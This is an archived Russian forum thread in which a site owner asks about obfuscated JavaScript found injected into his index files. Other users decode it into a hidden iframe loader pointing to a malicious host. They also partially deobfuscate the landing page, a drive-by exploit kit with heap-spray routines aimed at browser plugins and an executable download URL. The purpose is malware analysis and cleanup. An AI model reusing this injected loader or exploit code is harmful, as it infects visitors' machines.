(JavaScript)Что за функция? / HTML, JavaScript, VBScript, CSS

ReSQL.ru

2.0.61

Полная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / (JavaScript)Что за функция? / 15 сообщений из 15, страница 1 из 1

25.12.2008, 20:03

#35735935

v_sergio_v

Гость

(JavaScript)Что за функция?

Подскажите пожалуйста!
Нашел на сайте вот такую запись в индекс файле:
<script>function c18-748737271n495324b0bb72c(n495324b0bbf00){ function n495324b0bc6d5(){var n495324b0bcea8=16;return n495324b0bcea8;} return (parseInt(n495324b0bbf00,n495324b0bc6d5()));}function n495324b0bd67c(n495324b0bde50){ var n495324b0bf5cc=2; var n495324b0be624='';n495324b0c0573=String.fromCharCode;for(n495324b0bedf7=0;n495324b0bedf7<n495324b0bde50.length;n495324b0bedf7+=n495324b0bf5cc){ n495324b0be624+=(n495324b0c0573(c18-748737271n495324b0bb72c(n495324b0bde50.substr(n495324b0bedf7,n495324b0bf5cc))));}return n495324b0be624;} var x4b='';var n495324b0c0d47='3C7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E696628216D7'+x4b+'96961297'+x4b+'B646F637'+x4b+'56D656E7'+x4b+'42E7'+x4b+'7'+x4b+'7'+x4b+'2697'+x4b+'465287'+x4b+'56E657'+x4b+'363617'+x4b+'065282027'+x4b+'2533632536392536362537'+x4b+'322536312536642536352532302536652536312536642536352533642536332533312533382532302537'+x4b+'332537'+x4b+'32253633253364253237'+x4b+'2536382537'+x4b+'342537'+x4b+'342537'+x4b+'302533612532662532662537'+x4b+'342537'+x4b+'322536312536362536392536622537'+x4b+'332532652536332536652532662537'+x4b+'342536342537'+x4b+'332532662536392536652536342536352537'+x4b+'382532652537'+x4b+'302536382537'+x4b+'30253366253237'+x4b+'2532622534642536312537'+x4b+'342536382532652537'+x4b+'322536662537'+x4b+'352536652536342532382534642536312537'+x4b+'342536382532652537'+x4b+'32253631253665253634253666253664253238253239253261253331253331253334253336253336253239253262253237'+x4b+'253333253636253335253237'+x4b+'2532302537'+x4b+'37'+x4b+'2536392536342537'+x4b+'34253638253364253336253333253230253638253635253639253637'+x4b+'2536382537'+x4b+'342533642533312533382533322532302537'+x4b+'332537'+x4b+'342537'+x4b+'39253663253635253364253237'+x4b+'2537'+x4b+'362536392537'+x4b+'332536392536322536392536632536392537'+x4b+'342537'+x4b+'39253361253638253639253634253634253635253665253237'+x4b+'2533652533632532662536392536362537'+x4b+'3225363125366425363525336527'+x4b+'29293B7'+x4b+'D7'+x4b+'6617'+x4b+'2206D7'+x4b+'969613D7'+x4b+'47'+x4b+'27'+x4b+'5653B3C2F7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E';document.write(n495324b0bd67c(n495324b0c0d47));</script>

Что может делать эта функция? Каким методом она зашифрована?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.12.2008, 20:23

#35735957

ShSerge

Участник

Откуда: ʚонɔ dиw
Сообщения: 24 440
Рейтинг: 0 / 0

(JavaScript)Что за функция?

v_sergio_v,
Поставь себе фирефокс с фиребугом и посмотри. Что, кто-то это за тебя делать должен? Тем более, что оторвано от контекста и вообще... .

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.12.2008, 21:30

#35736005

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

(JavaScript)Что за функция?

> function c18-748737271n495324b0bb72c(n495324b0bbf00){

Дефис (минус) в имени функции? )))))
ИМХО расчет на какую то дыру в браузере.
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.12.2008, 21:50

#35736029

v_sergio_v

Гость

(JavaScript)Что за функция?

Этот код я нашел у себя на сайте. Раньше его не было. Что именно он делает не пойму, т. к.
javascript почти не знаю.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.12.2008, 22:52

#35736094

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

(JavaScript)Что за функция?

Дружеский совет: если этот код никто осознанно не ставил на сайт, то удали его из этого файла, а так же из всех файлов в других директориях с этим же временем изменения. Перед этим _обязательно_ (а иначе можно и не начинать) сменить все пароли фтп-доступа к сайту и почистить от троянов компы, с которых заходили по фтп на хостинг.

PS откровенно лень смотреть, какую именно ссылку на сайт с вредоносным кодом (?) ентот скрипт сформирует.
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 00:06

#35736202

Ренат

Участник

Откуда: Елабуга & Казань & Москва & Набережные челны
Сообщения: 4 025
Рейтинг: 0 / 0

(JavaScript)Что за функция?

Вместо документ врайт прописал alert - не запускаеться)
Попробовал чуток подредактирваоть:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.

<script>
function n495324b0bb72c(n495324b0bbf00){
	function n495324b0bc6d5(){
	var n495324b0bcea8= 16 ;
	return n495324b0bcea8;
	}
return (parseInt(n495324b0bbf00,n495324b0bc6d5()));
}


function n495324b0bd67c(n495324b0bde50){
	var n495324b0bf5cc= 2 ;
	var n495324b0be624='';
	n495324b0c0573=String.fromCharCode;
	for(n495324b0bedf7= 0 ;n495324b0bedf7<n495324b0bde50.length;n495324b0bedf7+=n495324b0bf5cc){ 
		n495324b0be624+=(n495324b0c0573( 18 -n495324b0bb72c(n495324b0bde50.substr(n495324b0bedf7,n495324b0bf5cc))));
		}
	return n495324b0be624;
	}
	
var x4b='';
var n495324b0c0d47='3C7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E696628216D7'+x4b+'96961297'+x4b+'B646F637'+x4b+'56D656E7'+x4b+'42E7'+x4b+'7'+x4b+'7'+x4b+'2697'+x4b+'465287'+x4b+'56E657'+x4b+'363617'+x4b+'065282027'+x4b+'2533632536392536362537'+x4b+'322536312536642536352532302536652536312536642536352533642536332533312533382532302537'+x4b+'332537'+x4b+'32253633253364253237'+x4b+'2536382537'+x4b+'342537'+x4b+'342537'+x4b+'302533612532662532662537'+x4b+'342537'+x4b+'322536312536362536392536622537'+x4b+'332532652536332536652532662537'+x4b+'342536342537'+x4b+'332532662536392536652536342536352537'+x4b+'382532652537'+x4b+'302536382537'+x4b+'30253366253237'+x4b+'2532622534642536312537'+x4b+'342536382532652537'+x4b+'322536662537'+x4b+'352536652536342532382534642536312537'+x4b+'342536382532652537'+x4b+'32253631253665253634253666253664253238253239253261253331253331253334253336253336253239253262253237'+x4b+'253333253636253335253237'+x4b+'2532302537'+x4b+'37'+x4b+'2536392536342537'+x4b+'34253638253364253336253333253230253638253635253639253637'+x4b+'2536382537'+x4b+'342533642533312533382533322532302537'+x4b+'332537'+x4b+'342537'+x4b+'39253663253635253364253237'+x4b+'2537'+x4b+'362536392537'+x4b+'332536392536322536392536632536392537'+x4b+'342537'+x4b+'39253361253638253639253634253634253635253665253237'+x4b+'2533652533632532662536392536362537'+x4b+'3225363125366425363525336527'+x4b+'29293B7'+x4b+'D7'+x4b+'6617'+x4b+'2206D7'+x4b+'969613D7'+x4b+'47'+x4b+'27'+x4b+'5653B3C2F7'+x4b+'3637'+x4b+'2697'+x4b+'07'+x4b+'43E';
alert(n495324b0bd67c(n495324b0c0d47));
</script>

Получил на выхоже какую то бяку)
значит не прально редактировал я)

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 00:25

#35736234

v_sergio_v

Гость

(JavaScript)Что за функция?

Почистил. На сайте, все файлы index, были заражены этим гадом.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 00:28

#35736239

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

(JavaScript)Что за функция?

> все файлы index, были заражены

Стандартное поведение зверьков.
Не забудь про пароли и троянов.
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 00:29

#35736240

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

(JavaScript)Что за функция?

> значит не прально редактировал

Или не подобрал браузер, где эта шняга сработает "как надо" ))
Posted via ActualForum NNTP Server 1.4

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 01:35

#35736281

IDVsbruck

Участник

Откуда: Украина
Сообщения: 4 289
Рейтинг: 0 / 0

(JavaScript)Что за функция?

Упростил до:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.

function decoder(line){
	var decoded_line = '';
	for (var counter =  0 ; counter < line.length; counter +=  2 )
		decoded_line += (String.fromCharCode(parseInt(line.substr(counter,  2 ),  16 )));
	return decoded_line;
}
var virus_line = '3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312533382532302537332537322536332533642532372536382537342537342537302533612532662532662537342537322536312536362536392536622537332532652536332536652532662537342536342537332532662536392536652536342536352537382532652537302536382537302533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533312533342533362533362532392532622532372533332536362533352532372532302537372536392536342537342536382533642533362533332532302536382536352536392536372536382537342533642533312533382533322532302537332537342537392536632536352533642532372537362536392537332536392536322536392536632536392537342537392533612536382536392536342536342536352536652532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
document.write(decoder(virus_line));

На выходе получаем:

Код: plaintext

if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%38%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%72%61%66%69%6b%73%2e%63%6e%2f%74%64%73%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%31%34%36%36%29%2b%27%33%66%35%27%20%77%69%64%74%68%3d%36%33%20%68%65%69%67%68%74%3d%31%38%32%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;

или

Код: plaintext

if(!myia){document.write("<iframe name=c18 src='http://trafiks.cn/tds/index.php?'+Math.round(Math.random()*11466)+'3f5' width=63 height=182 style='visibility:hidden'></iframe>");}var myia=true;

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 01:39

#35736283

IDVsbruck

Участник

Откуда: Украина
Сообщения: 4 289
Рейтинг: 0 / 0

(JavaScript)Что за функция?

Иногда в таких "шнягах" находишь удивительные решения ...
Тут мне понравилось следующее:

Код: plaintext

1.
2.

n495324b0c0573=String.fromCharCode;
...
... += n495324b0c0573();

Как бы все понимаю, все нормально, просто нечасто встречаешься с переименованием встроенных функций. А ведь ничего такого ... а в ступор может ввести :)

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 10:46

#35736582

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

(JavaScript)Что за функция?

На странице http://trafiks.cn/tds/index.php валяется Bloodhound.Exploit.196 по классификации симантека.

Расшифровка страницы:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.

var url="http://trafiks.cn/fi/load.php?id=54";
			var m=new Array();
			var mf= 0 ;
			function hex(num,width){
				var digits="0123456789ABCDEF";
				var hex=digits.substr(num&0xF, 1 );
				while(num>0xF){
					num=num>>> 4 ;
					hex=digits.substr(num&0xF, 1 )+hex;
				}
				var width=(width?width: 0 );
				while(hex.length> 16 )&0xFFFF, 4 ));
			}
			function unes(str){
				var tmp="";
				for(var i= 0 ;i" +
						"" +
						"" +
						"" +
						"T\">" +
						"" +
						"";
						document.body.appendChild(my_div);

					}
				} catch(e) {}
				return  0 ;
			}
			function real(){
				try {
					var obj=null;
					obj = cobj("IERPCtl.IERPCtl.1");
					if (obj) {
						if(obj.PlayerProperty("PRODUCTVERSION")>"6.0.14.552") {
							obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
							ms();
							var m = "";
							var buf = addr(0x0c0c0c0c);
							while (buf.length <  32 )	buf += buf;
							buf = buf.substring( 0 , 32 );
							m = obj.Console;
							obj.Console = buf;
							obj.Console = m;
							m = obj.Console;
							obj.Console = buf;
							obj.Console = m;
						}
					}
				} catch(e){}
				return  0 ;
			}
			function ntaudio(){
				try{
					var obj=null;
					obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
					if(obj){
						ms();
						var buf = addr(0x0c0c0c0c);
						while (buf.length <  5200 ) buf += buf;
						buf = buf.substring( 0 , 5200 );
						obj.SetFormatLikeSample(buf);
					}
				}catch(e){}
				return  0 ;
			}
			function creative(){
				try{
					var obj=null;
					obj=cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
					if(obj){
						ms();
						var buf = addr(0x0c0c0c0c);
						while (buf.length <  512 ) buf += buf;
						buf = buf.substring( 0 , 512 );
						obj.cachefolder = buf;
					}
				}catch(e){}
				return  0 ;
			}

			function pdf(){
				try {
					var obj = null;
					obj = cobj("AcroPDF.PDF");
					if (!obj) {
						obj = cobj("PDF.PdfCtrl");
					}
					if (obj) {
						document.write("");
						setTimeout('pdf2();', 10000 );
					}
				} catch(e) {
					document.write("");
					setTimeout('pdf2();', 10000 );
				}
				return  0 ;
			}
			function pdf2(){
				var obj = null;
				obj = cobj("AcroPDF.PDF");
				if (!obj) {
					obj = cobj("PDF.PdfCtrl");
				}
				if (obj) {
					wnd=window;
					while (wnd.parent!=wnd){ wnd=wnd.parent; }
					wnd.location="http://trafiks.cn/fi/pdf.php?id=54&vis=1";		
				}
				return  0 ;
			}
			function wme(){
				try {
					var obj=null;
					obj=cobj("{A8D3AD02-7508-4004-B2E9-AD33F087F43C}");
					if(obj){
						ms();
						var buf = addr(0x0c0c0c0c);
						while (buf.length <  2000 ) buf += buf;
						buf = buf.substring( 0 , 2000 );
						obj.GetDetailsString(buf, 1 );
					}
				} catch(e){}
				return  0 ;
			}

			if (
				office() ||
				dl() ||
				pdf() ||
				wme() ||
				ya1() ||
				ya2() ||
				fb() ||
				mdss() ||
				creative() ||
				wks() ||
				ogame() ||
				ca() ||
				buddy() ||
				gomweb() ||
				xmlcore() ||
				quick() ||
				real() ||
				ntaudio()
				) {}

Что самое интересное, эта беда выпоняется функцией eval, которую я заменил на document.write("<pre>" + расшифровка + "</pre>") и открыл страницу. Так все равно в кэш IE проскочил не html, а pdf-файл, на который, собственно, и ругнулся симантек.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 11:30

#35736695

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

(JavaScript)Что за функция?

Далее...
По адресу http://trafiks.cn/fi/pdf.php?id=54&vis=1 находится какой-то файл, походу pdf, который рубится симантеком как Bloodhound.Exploit.213, а самое интересное по адресу http://trafiks.cn/fi/load.php?id=54 — какой-то экзешник, неумело замаскированный (см. скриншот, красным указаны косяки) под микрософтовскую прибамбасину, на который симантек не реагирует. Файл сохраняется под именем DOSKEY.EXE. Такой файл действительно есть в дистрибутиве, его размер 10 752 байт против 31 744 вирусни.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 11:41

#35736725

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

(JavaScript)Что за функция?

http://www.kaspersky.ru/scanforvirus сообщил, что это P2P-Worm.Win32.Agent.hw

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

26.12.2008, 16:26

#35737508

v_sergio_v

Гость

(JavaScript)Что за функция?

Спасибо большое!
Скачал прогу Acunetix Web Vulnerability Scanner, после сканирования нашел "дыру" на сайте в форме обратной связи.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&tablet=1&tid=1455367]:	0ms
get settings:	5ms
get forum list:	9ms
check forum access:	2ms
check topic access:	2ms
track hit:	34ms
get topic data:	6ms
get forum data:	1ms
get page messages:	27ms
get tp. blocked users:	1ms
others:	200ms

total:	287ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы